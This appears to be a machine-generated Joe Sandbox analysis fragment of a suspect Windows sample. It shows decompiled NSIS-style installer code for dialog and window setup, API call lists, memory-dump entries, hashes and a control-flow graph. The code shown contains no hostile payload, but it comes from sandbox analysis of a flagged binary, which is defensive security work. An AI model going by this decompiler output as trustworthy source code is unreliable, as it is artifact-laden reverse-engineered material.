                                                                        						 *0x423744 = GetDlgItem(_t127, 1);
                                                                        						_t91 = GetDlgItem(_t127, 2);
                                                                        						_push(0xffffffff);
                                                                        						_push(0x1c);
                                                                        						 *0x421710 = _t91;
                                                                        						E004045C4(_t127);
                                                                        						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                                        						 *0x42922c = E0040140B(4);
                                                                        						_t34 = 1;
                                                                        						__eflags = 1;
                                                                        						 *0x423730 = 1;
                                                                        					}
                                                                        					_t124 =  *0x40a39c; // 0x0
                                                                        					_t136 = 0;
                                                                        					_t133 = (_t124 << 6) +  *0x42a280;
                                                                        					__eflags = _t124;
                                                                        					if(_t124 < 0) {
                                                                        						L36:
                                                                        						E00404610(0x40b);
                                                                        						while(1) {
                                                                        							_t36 =  *0x423730;
                                                                        							 *0x40a39c =  *0x40a39c + _t36;
                                                                        							_t133 = _t133 + (_t36 << 6);
                                                                        							_t38 =  *0x40a39c; // 0x0
                                                                        							__eflags = _t38 -  *0x42a284;
                                                                        							if(_t38 ==  *0x42a284) {
                                                                        								E0040140B(1);
                                                                        							}
                                                                        							__eflags =  *0x42922c - _t136;
                                                                        							if( *0x42922c != _t136) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                        							if(__eflags >= 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t117 =  *(_t133 + 0x14);
                                                                        							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                        							_push(0xfffffc19);
                                                                        							E004045C4(_t127);
                                                                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                        							_push(0xfffffc1b);
                                                                        							E004045C4(_t127);
                                                                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                        							_push(0xfffffc1a);
                                                                        							E004045C4(_t127);
                                                                        							_t48 = GetDlgItem(_t127, 3);
                                                                        							__eflags =  *0x42a2ec - _t136;
                                                                        							_v28 = _t48;
                                                                        							if( *0x42a2ec != _t136) {
                                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                        								__eflags = _t117;
                                                                        							}
                                                                        							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                        							E004045E6(_t117 & 0x00000002);
                                                                        							_t118 = _t117 & 0x00000004;
                                                                        							EnableWindow( *0x421710, _t118);
                                                                        							__eflags = _t118 - _t136;
                                                                        							if(_t118 == _t136) {
                                                                        								_push(1);
                                                                        							} else {
                                                                        								_push(_t136);
                                                                        							}
                                                                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                        							__eflags =  *0x42a2ec - _t136;
                                                                        							if( *0x42a2ec == _t136) {
                                                                        								_push( *0x423744);
                                                                        							} else {
                                                                        								SendMessageW(_t127, 0x401, 2, _t136);
                                                                        								_push( *0x421710);
                                                                        							}
                                                                        							E004045F9();
                                                                        							E00406668(0x423748, E004040A6());
                                                                        							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                        							SetWindowTextW(_t127, 0x423748); // executed
                                                                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                                        							__eflags = _t67;
                                                                        							if(_t67 != 0) {
                                                                        								continue;
                                                                        							} else {
                                                                        								__eflags =  *_t133 - _t136;
                                                                        								if( *_t133 == _t136) {
                                                                        									continue;
                                                                        								}
                                                                        								__eflags =  *(_t133 + 4) - 5;
                                                                        								if( *(_t133 + 4) != 5) {
                                                                        									DestroyWindow( *0x429238); // executed
                                                                        									 *0x422720 = _t133;
                                                                        									__eflags =  *_t133 - _t136;
                                                                        									if( *_t133 <= _t136) {
                                                                        										goto L60;
                                                                        									}
                                                                        									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                        									__eflags = _t73 - _t136;
                                                                        									 *0x429238 = _t73;
                                                                        									if(_t73 == _t136) {
                                                                        										goto L60;
                                                                        									}
                                                                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                        									_push(6);
                                                                        									E004045C4(_t73);
                                                                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                        									ScreenToClient(_t127, _t137 + 0x10);
                                                                        									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                        									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                                        									__eflags =  *0x42922c - _t136;
                                                                        									if( *0x42922c != _t136) {
                                                                        										goto L63;
                                                                        									}
                                                                        									ShowWindow( *0x429238, 8); // executed
                                                                        									E00404610(0x405);
                                                                        									goto L60;
                                                                        								}
                                                                        								__eflags =  *0x42a2ec - _t136;
                                                                        								if( *0x42a2ec != _t136) {
                                                                        									goto L63;
                                                                        								}
                                                                        								__eflags =  *0x42a2e0 - _t136;
                                                                        								if( *0x42a2e0 != _t136) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L63;
                                                                        							}
                                                                        						}
                                                                        						DestroyWindow( *0x429238);
                                                                        						 *0x42a268 = _t136;
                                                                        						EndDialog(_t127,  *0x421f18);
                                                                        						goto L60;
                                                                        					} else {
                                                                        						__eflags = _t34 - 1;
                                                                        						if(_t34 != 1) {
                                                                        							L35:
                                                                        							__eflags =  *_t133 - _t136;
                                                                        							if( *_t133 == _t136) {
                                                                        								goto L63;
                                                                        							}
                                                                        							goto L36;
                                                                        						}
                                                                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                                        						__eflags = _t86;
                                                                        						if(_t86 == 0) {
                                                                        							goto L35;
                                                                        						}
                                                                        						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                        						__eflags =  *0x42922c;
                                                                        						return 0 |  *0x42922c == 0x00000000;
                                                                        					}
                                                                        				} else {
                                                                        					_t127 = _a4;
                                                                        					_t136 = 0;
                                                                        					if(_t130 == 0x47) {
                                                                        						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                                        					}
                                                                        					_t122 = _a12;
                                                                        					if(_t130 != 5) {
                                                                        						L8:
                                                                        						if(_t130 != 0x40d) {
                                                                        							__eflags = _t130 - 0x11;
                                                                        							if(_t130 != 0x11) {
                                                                        								__eflags = _t130 - 0x111;
                                                                        								if(_t130 != 0x111) {
                                                                        									goto L28;
                                                                        								}
                                                                        								_t135 = _t122 & 0x0000ffff;
                                                                        								_t128 = GetDlgItem(_t127, _t135);
                                                                        								__eflags = _t128 - _t136;
                                                                        								if(_t128 == _t136) {
                                                                        									L15:
                                                                        									__eflags = _t135 - 1;
                                                                        									if(_t135 != 1) {
                                                                        										__eflags = _t135 - 3;
                                                                        										if(_t135 != 3) {
                                                                        											_t129 = 2;
                                                                        											__eflags = _t135 - _t129;
                                                                        											if(_t135 != _t129) {
                                                                        												L27:
                                                                        												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                                        												goto L28;
                                                                        											}
                                                                        											__eflags =  *0x42a2ec - _t136;
                                                                        											if( *0x42a2ec == _t136) {
                                                                        												_t99 = E0040140B(3);
                                                                        												__eflags = _t99;
                                                                        												if(_t99 != 0) {
                                                                        													goto L28;
                                                                        												}
                                                                        												 *0x421f18 = 1;
                                                                        												L23:
                                                                        												_push(0x78);
                                                                        												L24:
                                                                        												E0040459D();
                                                                        												goto L28;
                                                                        											}
                                                                        											E0040140B(_t129);
                                                                        											 *0x421f18 = _t129;
                                                                        											goto L23;
                                                                        										}
                                                                        										__eflags =  *0x40a39c - _t136; // 0x0
                                                                        										if(__eflags <= 0) {
                                                                        											goto L27;
                                                                        										}
                                                                        										_push(0xffffffff);
                                                                        										goto L24;
                                                                        									}
                                                                        									_push(_t135);
                                                                        									goto L24;
                                                                        								}
                                                                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                        								_t103 = IsWindowEnabled(_t128);
                                                                        								__eflags = _t103;
                                                                        								if(_t103 == 0) {
                                                                        									L63:
                                                                        									return 0;
                                                                        								}
                                                                        								goto L15;
                                                                        							}
                                                                        							SetWindowLongW(_t127, _t136, _t136);
                                                                        							return 1;
                                                                        						}
                                                                        						DestroyWindow( *0x429238);
                                                                        						 *0x429238 = _t122;
                                                                        						L60:
                                                                        						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                                                        							ShowWindow(_t127, 0xa); // executed
                                                                        							 *0x425748 = 1;
                                                                        						}
                                                                        						goto L63;
                                                                        					} else {
                                                                        						asm("sbb eax, eax");
                                                                        						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                        						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                        							L28:
                                                                        							return E0040462B(_a8, _t122, _a16);
                                                                        						} else {
                                                                        							ShowWindow(_t127, 4);
                                                                        							goto L8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}































                                                                        0x004040d0
                                                                        0x004040d7
                                                                        0x0040423e
                                                                        0x00404242
                                                                        0x00404246
                                                                        0x00404248
                                                                        0x0040424d
                                                                        0x00404258
                                                                        0x00404263
                                                                        0x00404268
                                                                        0x0040426a
                                                                        0x0040426c
                                                                        0x0040426f
                                                                        0x00404274
                                                                        0x00404282
                                                                        0x0040428f
                                                                        0x00404296
                                                                        0x00404296
                                                                        0x00404297
                                                                        0x00404297
                                                                        0x0040429c
                                                                        0x004042a2
                                                                        0x004042a9
                                                                        0x004042af
                                                                        0x004042b1
                                                                        0x004042f1
                                                                        0x004042f6
                                                                        0x004042fb
                                                                        0x004042fb
                                                                        0x00404300
                                                                        0x00404309
                                                                        0x0040430b
                                                                        0x00404310
                                                                        0x00404316
                                                                        0x0040431a
                                                                        0x0040431a
                                                                        0x0040431f
                                                                        0x00404325
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404330
                                                                        0x00404336
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040433f
                                                                        0x00404347
                                                                        0x0040434c
                                                                        0x0040434f
                                                                        0x00404355
                                                                        0x0040435a
                                                                        0x0040435d
                                                                        0x00404363
                                                                        0x00404368
                                                                        0x0040436b
                                                                        0x00404371
                                                                        0x00404379
                                                                        0x0040437f
                                                                        0x00404385
                                                                        0x00404389
                                                                        0x00404390
                                                                        0x00404390
                                                                        0x00404390
                                                                        0x0040439a
                                                                        0x004043ac
                                                                        0x004043b8
                                                                        0x004043bd
                                                                        0x004043c7
                                                                        0x004043cd
                                                                        0x004043cf
                                                                        0x004043d4
                                                                        0x004043d1
                                                                        0x004043d1
                                                                        0x004043d1
                                                                        0x004043e4
                                                                        0x004043fc
                                                                        0x004043fe
                                                                        0x00404404
                                                                        0x00404419
                                                                        0x00404406
                                                                        0x0040440f
                                                                        0x00404411
                                                                        0x00404411
                                                                        0x0040441f
                                                                        0x00404430
                                                                        0x00404446
                                                                        0x0040444d
                                                                        0x00404457
                                                                        0x0040445c
                                                                        0x0040445e
                                                                        0x00000000
                                                                        0x00404464
                                                                        0x00404464
                                                                        0x00404466
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040446c
                                                                        0x00404470
                                                                        0x00404495
                                                                        0x0040449b
                                                                        0x004044a1
                                                                        0x004044a3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004044c9
                                                                        0x004044cf
                                                                        0x004044d1
                                                                        0x004044d6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004044dc
                                                                        0x004044df
                                                                        0x004044e2
                                                                        0x004044f9
                                                                        0x00404505
                                                                        0x0040451e
                                                                        0x00404528
                                                                        0x0040452d
                                                                        0x00404533
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040453d
                                                                        0x00404548
                                                                        0x00000000
                                                                        0x00404548
                                                                        0x00404472
                                                                        0x00404478
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040447e
                                                                        0x00404484
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040448a
                                                                        0x0040445e
                                                                        0x00404555
                                                                        0x00404561
                                                                        0x00404568
                                                                        0x00000000
                                                                        0x004042b3
                                                                        0x004042b3
                                                                        0x004042b6
                                                                        0x004042e9
                                                                        0x004042e9
                                                                        0x004042eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004042eb
                                                                        0x004042bc
                                                                        0x004042c1
                                                                        0x004042c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004042d3
                                                                        0x004042db
                                                                        0x00000000
                                                                        0x004042e1
                                                                        0x004040e9
                                                                        0x004040e9
                                                                        0x004040ed
                                                                        0x004040f2
                                                                        0x00404101
                                                                        0x00404101
                                                                        0x00404107
                                                                        0x0040410e
                                                                        0x00404152
                                                                        0x00404158
                                                                        0x00404171
                                                                        0x00404174
                                                                        0x00404187
                                                                        0x0040418d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404193
                                                                        0x0040419e
                                                                        0x004041a0
                                                                        0x004041a2
                                                                        0x004041c1
                                                                        0x004041c1
                                                                        0x004041c4
                                                                        0x004041c9
                                                                        0x004041cc
                                                                        0x004041dc
                                                                        0x004041dd
                                                                        0x004041df
                                                                        0x00404215
                                                                        0x00404225
                                                                        0x00000000
                                                                        0x00404225
                                                                        0x004041e1
                                                                        0x004041e7
                                                                        0x00404200
                                                                        0x00404205
                                                                        0x00404207
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404209
                                                                        0x004041f5
                                                                        0x004041f5
                                                                        0x004041f7
                                                                        0x004041f7
                                                                        0x00000000
                                                                        0x004041f7
                                                                        0x004041ea
                                                                        0x004041ef
                                                                        0x00000000
                                                                        0x004041ef
                                                                        0x004041ce
                                                                        0x004041d4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004041d6
                                                                        0x00000000
                                                                        0x004041d6
                                                                        0x004041c6
                                                                        0x00000000
                                                                        0x004041c6
                                                                        0x004041ac
                                                                        0x004041b3
                                                                        0x004041b9
                                                                        0x004041bb
                                                                        0x00404591
                                                                        0x00000000
                                                                        0x00404591
                                                                        0x00000000
                                                                        0x004041bb
                                                                        0x00404179
                                                                        0x00000000
                                                                        0x00404181
                                                                        0x00404160
                                                                        0x00404166
                                                                        0x0040456e
                                                                        0x00404574
                                                                        0x00404581
                                                                        0x00404587
                                                                        0x00404587
                                                                        0x00000000
                                                                        0x00404110
                                                                        0x00404115
                                                                        0x00404121
                                                                        0x0040412a
                                                                        0x0040422b
                                                                        0x00000000
                                                                        0x00404149
                                                                        0x0040414c
                                                                        0x00000000
                                                                        0x0040414c
                                                                        0x0040412a
                                                                        0x0040410e

                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                        • ShowWindow.USER32(?), ref: 00404121
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                        • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                        • DestroyWindow.USER32 ref: 00404160
                                                                        • SetWindowLongW.USER32 ref: 00404179
                                                                        • GetDlgItem.USER32 ref: 00404198
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                        • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                        • GetDlgItem.USER32 ref: 0040425E
                                                                        • GetDlgItem.USER32 ref: 00404268
                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                        • GetDlgItem.USER32 ref: 00404379
                                                                        • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                        • EnableWindow.USER32(?,?), ref: 004043C7
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                        • EnableMenuItem.USER32 ref: 004043E4
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                        • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                        • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                                        • String ID: H7B
                                                                        • API String ID: 3618520773-2300413410
                                                                        • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                        • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                        • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                        • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 313 403d9d-403dc6 call 403fed call 40603f 304->313 309 403d92-403d98 lstrcatW 305->309 310 403d7c-403d8d call 406536 305->310 309->313 310->309 319 403e58-403e60 call 40603f 313->319 320 403dcc-403dd1 313->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 321 403dd7-403dff call 406536 320->321 321->319 330 403e01-403e05 321->330 326->327 328 403f14-403f1c call 40140b 327->328 329 403e95-403ec5 RegisterClassW 327->329 343 403f26-403f31 call 403fed 328->343 344 403f1e-403f21 328->344 332 403fe3 329->332 333 403ecb-403f0f SystemParametersInfoW CreateWindowExW 329->333 335 403e17-403e23 lstrlenW 330->335 336 403e07-403e14 call 405f64 330->336 341 403fe5-403fec 332->341 333->328 337 403e25-403e33 lstrcmpiW 335->337 338 403e4b-403e53 call 405f37 call 406668 335->338 336->335 337->338 342 403e35-403e3f GetFileAttributesW 337->342 338->319 347 403e41-403e43 342->347 348 403e45-403e46 call 405f83 342->348 354 403f37-403f51 ShowWindow call 4069c5 343->354 355 403fba-403fbb call 40579d 343->355 344->341 347->338 347->348 348->338 362 403f53-403f58 call 4069c5 354->362 363 403f5d-403f6f GetClassInfoW 354->363 358 403fc0-403fc2 355->358 360 403fc4-403fca 358->360 361 403fdc-403fde call 40140b 358->361 360->344 364 403fd0-403fd7 call 40140b 360->364 361->332 362->363 367 403f71-403f81 GetClassInfoW RegisterClassW 363->367 368 403f87-403faa DialogBoxParamW call 40140b 363->368 364->344 367->368 371 403faf-403fb8 call 403c67 368->371 371->341
                                                                        C-Code - Quality: 96%
                                                                        			E00403D17(void* __eflags) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				void _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t22;
                                                                        				void* _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				void* _t36;
                                                                        				int _t39;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				short _t63;
                                                                        				WCHAR* _t65;
                                                                        				signed char _t69;
                                                                        				WCHAR* _t76;
                                                                        				intOrPtr _t82;
                                                                        				WCHAR* _t87;
                                                                        
                                                                        				_t82 =  *0x42a270;
                                                                        				_t22 = E00406A35(2);
                                                                        				_t90 = _t22;
                                                                        				if(_t22 == 0) {
                                                                        					_t76 = 0x423748;
                                                                        					L"1033" = 0x30;
                                                                        					 *0x437002 = 0x78;
                                                                        					 *0x437004 = 0;
                                                                        					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                        					__eflags =  *0x423748;
                                                                        					if(__eflags == 0) {
                                                                        						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                        					}
                                                                        					lstrcatW(L"1033", _t76);
                                                                        				} else {
                                                                        					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                        				}
                                                                        				E00403FED(_t78, _t90);
                                                                        				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                                        				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                        				 *0x42a2fc = 0x10000;
                                                                        				if(E0040603F(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                                                                        					L16:
                                                                        					if(E0040603F(_t98, _t86) == 0) {
                                                                        						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                        					}
                                                                        					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                        					 *0x429248 = _t30;
                                                                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                        						L21:
                                                                        						if(E0040140B(0) == 0) {
                                                                        							_t32 = E00403FED(_t78, __eflags);
                                                                        							__eflags =  *0x42a300;
                                                                        							if( *0x42a300 != 0) {
                                                                        								_t33 = E0040579D(_t32, 0);
                                                                        								__eflags = _t33;
                                                                        								if(_t33 == 0) {
                                                                        									E0040140B(1);
                                                                        									goto L33;
                                                                        								}
                                                                        								__eflags =  *0x42922c;
                                                                        								if( *0x42922c == 0) {
                                                                        									E0040140B(2);
                                                                        								}
                                                                        								goto L22;
                                                                        							}
                                                                        							ShowWindow( *0x423728, 5); // executed
                                                                        							_t39 = E004069C5("RichEd20"); // executed
                                                                        							__eflags = _t39;
                                                                        							if(_t39 == 0) {
                                                                        								E004069C5("RichEd32");
                                                                        							}
                                                                        							_t87 = L"RichEdit20W";
                                                                        							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                        							__eflags = _t40;
                                                                        							if(_t40 == 0) {
                                                                        								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                        								 *0x429224 = _t87;
                                                                        								RegisterClassW(0x429200);
                                                                        							}
                                                                        							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                        							E00403C67(E0040140B(5), 1);
                                                                        							return _t44;
                                                                        						}
                                                                        						L22:
                                                                        						_t36 = 2;
                                                                        						return _t36;
                                                                        					} else {
                                                                        						_t78 =  *0x42a260;
                                                                        						 *0x429204 = E00401000;
                                                                        						 *0x429210 =  *0x42a260;
                                                                        						 *0x429214 = _t30;
                                                                        						 *0x429224 = 0x40a3b4;
                                                                        						if(RegisterClassW(0x429200) == 0) {
                                                                        							L33:
                                                                        							__eflags = 0;
                                                                        							return 0;
                                                                        						}
                                                                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                        						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                        						goto L21;
                                                                        					}
                                                                        				} else {
                                                                        					_t78 =  *(_t82 + 0x48);
                                                                        					_t92 = _t78;
                                                                        					if(_t78 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					_t76 = 0x428200;
                                                                        					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                        					_t63 =  *0x428200; // 0x43
                                                                        					if(_t63 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					if(_t63 == 0x22) {
                                                                        						_t76 = 0x428202;
                                                                        						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                        					}
                                                                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                        						L15:
                                                                        						E00406668(_t86, E00405F37(_t76));
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t69 = GetFileAttributesW(_t76);
                                                                        						if(_t69 == 0xffffffff) {
                                                                        							L14:
                                                                        							E00405F83(_t76);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t98 = _t69 & 0x00000010;
                                                                        						if((_t69 & 0x00000010) != 0) {
                                                                        							goto L15;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}
























                                                                        0x00403d1d
                                                                        0x00403d26
                                                                        0x00403d2d
                                                                        0x00403d2f
                                                                        0x00403d43
                                                                        0x00403d55
                                                                        0x00403d5e
                                                                        0x00403d67
                                                                        0x00403d6e
                                                                        0x00403d73
                                                                        0x00403d7a
                                                                        0x00403d8d
                                                                        0x00403d8d
                                                                        0x00403d98
                                                                        0x00403d31
                                                                        0x00403d3c
                                                                        0x00403d3c
                                                                        0x00403d9d
                                                                        0x00403da7
                                                                        0x00403db0
                                                                        0x00403db5
                                                                        0x00403dc6
                                                                        0x00403e58
                                                                        0x00403e60
                                                                        0x00403e69
                                                                        0x00403e69
                                                                        0x00403e7f
                                                                        0x00403e85
                                                                        0x00403e93
                                                                        0x00403f14
                                                                        0x00403f1c
                                                                        0x00403f26
                                                                        0x00403f2b
                                                                        0x00403f31
                                                                        0x00403fbb
                                                                        0x00403fc0
                                                                        0x00403fc2
                                                                        0x00403fde
                                                                        0x00000000
                                                                        0x00403fde
                                                                        0x00403fc4
                                                                        0x00403fca
                                                                        0x00403fd2
                                                                        0x00403fd2
                                                                        0x00000000
                                                                        0x00403fca
                                                                        0x00403f3f
                                                                        0x00403f4a
                                                                        0x00403f4f
                                                                        0x00403f51
                                                                        0x00403f58
                                                                        0x00403f58
                                                                        0x00403f63
                                                                        0x00403f6b
                                                                        0x00403f6d
                                                                        0x00403f6f
                                                                        0x00403f78
                                                                        0x00403f7b
                                                                        0x00403f81
                                                                        0x00403f81
                                                                        0x00403fa0
                                                                        0x00403fb1
                                                                        0x00000000
                                                                        0x00403fb6
                                                                        0x00403f1e
                                                                        0x00403f20
                                                                        0x00000000
                                                                        0x00403e95
                                                                        0x00403e95
                                                                        0x00403ea1
                                                                        0x00403eab
                                                                        0x00403eb1
                                                                        0x00403eb6
                                                                        0x00403ec5
                                                                        0x00403fe3
                                                                        0x00403fe3
                                                                        0x00000000
                                                                        0x00403fe3
                                                                        0x00403ed4
                                                                        0x00403f0f
                                                                        0x00000000
                                                                        0x00403f0f
                                                                        0x00403dcc
                                                                        0x00403dcc
                                                                        0x00403dcf
                                                                        0x00403dd1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403ddf
                                                                        0x00403df1
                                                                        0x00403df6
                                                                        0x00403dff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403e05
                                                                        0x00403e07
                                                                        0x00403e14
                                                                        0x00403e14
                                                                        0x00403e1d
                                                                        0x00403e23
                                                                        0x00403e4b
                                                                        0x00403e53
                                                                        0x00000000
                                                                        0x00403e35
                                                                        0x00403e36
                                                                        0x00403e3f
                                                                        0x00403e45
                                                                        0x00403e46
                                                                        0x00000000
                                                                        0x00403e46
                                                                        0x00403e41
                                                                        0x00403e43
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403e43
                                                                        0x00403e23

                                                                        APIs
                                                                          • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                          • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                        • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F1FAA0), ref: 00403E18
                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                        • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                        • LoadImageW.USER32 ref: 00403E7F
